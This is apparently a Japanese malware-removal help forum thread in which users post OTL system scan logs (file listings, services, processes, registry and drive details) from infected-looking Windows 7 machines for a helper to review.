[2015/05/05 09:53:24 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/05/05 09:53:03 | 2132,983,807 | -HS- | M] () -- C:\hiberfil.sys
[2015/05/04 01:17:17 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2015/05/04 01:11:51 | 000,000,733 | ---- | M] () -- C:\Users\kotaro\Desktop\AdwCleaner.lnk
[2015/05/04 00:47:53 | 000,001,102 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/05/01 04:11:31 | 000,236,080 | ---- | M] (Trend Micro Inc.) -- C:\Windows\RegBootClean64.exe
[2015/05/01 01:16:45 | 000,001,331 | ---- | M] () -- C:\Users\kotaro\Desktop\ウイルスバスター クラウド.lnk
[2015/05/01 01:11:18 | 000,000,059 | ---- | M] () -- C:\Windows\SysNative\SupportTool.exe.bat
[2015/05/01 01:09:28 | 000,000,036 | ---- | M] () -- C:\Users\kotaro\AppData\Local\housecall.guid.cache
[2015/05/01 00:59:13 | 000,000,000 | ---- | M] () -- C:\Windows\SysWow64\drivers\AVG\iavifw.avm
[2015/04/29 22:30:35 | 000,000,822 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/29 09:39:11 | 000,001,753 | ---- | M] () -- C:\Users\Public\Desktop\iTunes.lnk
[2015/04/26 00:33:01 | 000,000,068 | ---- | M] () -- C:\Users\kotaro\AppData\Roaming\WB.CFG
[2015/04/25 09:06:36 | 000,001,021 | ---- | M] () -- C:\Users\kotaro\Desktop\Dropbox.lnk
[2015/04/18 16:03:05 | 000,778,416 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2015/04/18 16:03:05 | 000,142,512 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/16 06:57:20 | 001,294,734 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2015/04/16 06:57:20 | 000,654,828 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2015/04/16 06:57:20 | 000,412,028 | ---- | M] () -- C:\Windows\SysNative\perfh011.dat
[2015/04/16 06:57:20 | 000,122,826 | ---- | M] () -- C:\Windows\SysNative\perfc011.dat
[2015/04/16 06:57:20 | 000,122,700 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2015/04/16 06:57:11 | 001,294,734 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[6 C:\Windows\SysWow64\*.tmp files -> C:\Windows\SysWow64\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Users\kotaro\Documents\*.tmp files -> C:\Users\kotaro\Documents\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/05/04 01:11:30 | 000,000,733 | ---- | C] () -- C:\Users\kotaro\Desktop\AdwCleaner.lnk
[2015/05/04 00:46:24 | 000,001,102 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/05/01 01:16:45 | 000,001,331 | ---- | C] () -- C:\Users\kotaro\Desktop\ウイルスバスター クラウド.lnk
[2015/05/01 01:11:18 | 000,000,059 | ---- | C] () -- C:\Windows\SysNative\SupportTool.exe.bat
[2015/05/01 01:09:28 | 000,000,036 | ---- | C] () -- C:\Users\kotaro\AppData\Local\housecall.guid.cache
[2015/05/01 00:59:13 | 000,000,000 | ---- | C] () -- C:\Windows\SysWow64\drivers\AVG\iavifw.avm
[2015/04/29 22:30:35 | 000,000,822 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/29 09:39:11 | 000,001,753 | ---- | C] () -- C:\Users\Public\Desktop\iTunes.lnk
[2015/04/25 09:33:01 | 000,000,068 | ---- | C] () -- C:\Users\kotaro\AppData\Roaming\WB.CFG
[2015/04/16 06:41:38 | 000,016,303 | ---- | C] () -- C:\Windows\SysWow64\ieuinit.inf
[2015/04/16 06:41:38 | 000,016,303 | ---- | C] () -- C:\Windows\SysNative\ieuinit.inf
[2014/06/12 01:09:04 | 000,000,161 | ---- | C] () -- C:\Windows\DISPARAM.INI
[2014/02/26 23:59:21 | 001,294,734 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/11/16 09:33:28 | 000,000,000 | ---- | C] () -- C:\Windows\SysWow64\baidujp_update.ini
[2013/06/28 06:39:29 | 000,003,728 | ---- | C] () -- C:\Program Files (x86)\Mozilla Firefoxavg-secure-search.xml
[2011/12/28 23:40:03 | 660,750,666 | ---- | C] () -- C:\Users\kotaro\PremiereElements_10_Content_HD1_LS15.7z
[2011/08/14 16:15:17 | 000,003,584 | ---- | C] () -- C:\Users\kotaro\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/04/11 22:46:09 | 000,000,088 | RHS- | C] () -- C:\ProgramData\0AE91EB331.sys
[2011/04/11 22:46:08 | 000,002,880 | -HS- | C] () -- C:\ProgramData\KGyGaAvL.sys
[2011/04/09 16:53:27 | 000,006,752 | ---- | C] () -- C:\Users\kotaro\AppData\Roaming\PrimoPDFSet.xml

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2009/07/14 13:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 14:22:33 | 014,177,280 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 14:26:18 | 012,875,264 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 10:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 21:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 10:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/05/05 23:03:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/05/05 09:54:03 | 000,000,350 | ---- | M] () -- C:\Windows\tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job
[2015/05/05 21:14:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/05/05 23:14:00 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/05/05 11:26:00 | 000,000,652 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-2455232710-2752153166-228219264-1000Core.job
[2015/05/05 22:26:00 | 000,000,704 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-2455232710-2752153166-228219264-1000UA.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD15EARS-00MVWB0 ATA Device
Partitions: 2
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE1 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD15EARS-00MVWB0 ATA Device
Partitions: 1
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE2 - External hard disk media
Interface type: USB
Media Type: External hard disk media
Model: I-O DATA HDCA-UT USB Device
Partitions: 1
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: Installable File System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 1,397.00GB
Starting Offset: 105906176
Hidden sectors: 0


DeviceID: Disk #1, Partition #0
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 1,397.00GB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #2, Partition #0
PartitionType: Installable File System
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 1,863.00GB
Starting Offset: 1048576
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2009/07/14 10:40:01 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2013/02/27 14:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2009/07/14 10:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:23 | 000,849,920 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2010/11/20 22:25:45 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2015/03/17 14:15:55 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2009/07/14 10:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2012/07/05 07:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:56 | 000,187,904 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV - [2015/02/03 12:12:14 | 000,143,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:24 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2010/11/20 22:26:04 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2010/11/20 21:18:30 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2011/03/03 15:24:16 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2009/07/14 10:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2009/07/14 10:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2010/11/20 22:26:39 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2009/07/14 10:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)
SRV - [2009/07/14 10:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 13:17:27 | 000,303,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2011/05/24 20:42:55 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2012/02/11 15:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
SRV:[b]64bit:[/b] - [2015/03/17 14:15:55 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2009/07/14 10:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:24 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:24 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:25 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2015/03/17 14:15:55 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:26 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:25 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2010/11/20 21:21:19 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2010/11/20 22:27:25 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:26 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2010/11/20 21:21:28 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/19 12:06:55 | 000,210,432 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2010/11/20 22:25:27 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)
SRV:[b]64bit:[/b] - [2015/02/03 12:30:55 | 000,680,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:25 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)
SRV:[b]64bit:[/b] - [2013/05/27 14:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:28 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)
SRV:[b]64bit:[/b] - [2010/11/20 22:26:59 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:28 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2010/11/20 22:24:58 | 000,128,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\msiexec.exe -- (msiserver)
SRV - [2010/11/20 21:17:22 | 000,073,216 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/25 12:24:41 | 002,553,856 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2010/11/20 22:26:07 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2009/07/14 10:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:[b]64bit:[/b] - [2010/11/20 22:27:28 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 129 bytes -> C:\ProgramData\Temp:8C35AEA7
@Alternate Data Stream - 1203 bytes -> C:\Users\kotaro\AppData\Local\8AwIzgfbVv1:2eZcsp2OhJ76C9RSKMVLK

< End of report >

以上です。宜しくお願い致します。
  • tarutaru
  • 2015/05/05 (Tue) 23:32:51
トピックを確認する 
OTL ログ1
返信ありがとうございます。

Lhaplusは一旦アンインストールしました。

>DMM電子書籍ビューア x64 Edition 2014/08/04
>sdrt(5.0, 64bit) 2014/06/27

上記の2つはGUに存在しておりませんでした。


OTLのログです

OTL logfile created on: 2015/05/05 23:37:56 - Run 2
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ERIO\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.98 Gb Total Physical Memory | 5.72 Gb Available Physical Memory | 71.67% Memory free
15.96 Gb Paging File | 13.49 Gb Available in Paging File | 84.50% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 921.89 Gb Total Space | 374.91 Gb Free Space | 40.67% Space Free | Partition Type: NTFS
Drive D: | 9.52 Gb Total Space | 1.17 Gb Free Space | 12.24% Space Free | Partition Type: NTFS

Computer Name: ERIO-HP | User Name: ERIO | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/05/05 22:17:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ERIO\Desktop\OTL.exe
PRC - [2015/03/15 22:30:11 | 003,613,710 | ---- | M] () -- C:\ProgramData\idxsvc\idxsvc.exe
PRC - [2015/03/15 22:30:10 | 000,294,912 | ---- | M] () -- C:\ProgramData\idxsvc\msmsvc.exe
PRC - [2015/03/08 20:36:40 | 000,056,648 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome Remote Desktop\42.0.2311.39\remoting_host.exe
PRC - [2013/12/19 10:45:48 | 000,395,120 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
PRC - [2013/12/19 03:35:02 | 002,239,376 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
PRC - [2013/12/13 12:20:28 | 004,696,432 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
PRC - [2013/12/13 05:16:54 | 000,769,904 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
PRC - [2012/10/09 08:15:51 | 000,039,808 | ---- | M] (Wacom Technology) -- C:\Program Files\Tablet\Wacom\WacomHost.exe
PRC - [2011/11/29 19:16:12 | 000,109,984 | ---- | M] (CypherTec Inc.) -- C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
PRC - [2011/09/09 18:28:30 | 002,656,280 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2011/09/09 18:28:00 | 000,326,168 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2011/08/12 09:54:32 | 001,128,952 | ---- | M] (PDF Complete Inc) -- C:\Program Files (x86)\PDF Complete\pdfsvc.exe
PRC - [2011/08/04 17:06:12 | 001,612,920 | ---- | M] (CANON INC.) -- C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE
PRC - [2011/02/24 00:10:24 | 000,212,944 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
PRC - [2011/02/08 01:56:11 | 000,138,192 | ---- | M] () -- C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
PRC - [2011/01/15 16:48:44 | 000,452,016 | ---- | M] (CANON INC.) -- C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
PRC - [2009/07/20 04:00:00 | 000,081,920 | ---- | M] () -- C:\Program Files\Logicool\SetPoint\x86\SetPoint32.exe
PRC - [2009/07/14 10:14:24 | 000,452,608 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PRC - [2008/11/20 10:47:28 | 000,062,768 | ---- | M] (Hewlett-Packard) -- C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2014/07/31 12:16:44 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/07/31 12:16:12 | 001,044,776 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2013/12/19 10:49:32 | 032,733,080 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\libcef.dll
MOD - [2013/12/13 12:20:28 | 004,696,432 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
MOD - [2009/07/20 04:00:00 | 000,081,920 | ---- | M] () -- C:\Program Files\Logicool\SetPoint\x86\SetPoint32.exe


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/03/13 12:54:00 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2013/05/27 14:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:[b]64bit:[/b] - [2013/02/09 03:37:01 | 000,613,688 | ---- | M] (Wacom Technology, Corp.) [Auto | Running] -- C:\Program Files\Tablet\Wacom\WTabletServicePro.exe -- (WTabletServicePro)
SRV:[b]64bit:[/b] - [2011/11/29 19:48:06 | 000,131,000 | ---- | M] (CypherTec Inc.) [Auto | Running] -- C:\Program Files\Common Files\CypherTec\cthwsrv64.exe -- (CypherGuard Info Service)
SRV:[b]64bit:[/b] - [2011/11/29 19:26:28 | 000,127,416 | ---- | M] (CypherTec Inc.) [Auto | Running] -- C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe -- (CypherGuard cguard Service 64bit Edition)
SRV:[b]64bit:[/b] - [2011/10/25 06:16:40 | 000,204,288 | ---- | M] (AMD) [Auto | Running] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility)
SRV:[b]64bit:[/b] - [2010/10/11 02:48:14 | 000,346,168 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe -- (HPClientSvc)
SRV:[b]64bit:[/b] - [2010/09/22 18:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV:[b]64bit:[/b] - [2009/07/20 13:42:46 | 000,160,784 | ---- | M] (Logicool, Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe -- (LBTServ)
SRV:[b]64bit:[/b] - [2009/07/14 10:39:31 | 000,045,568 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rundll32.exe -- (3d92efd2)
SRV - [2015/05/03 22:44:57 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/04/16 08:55:15 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
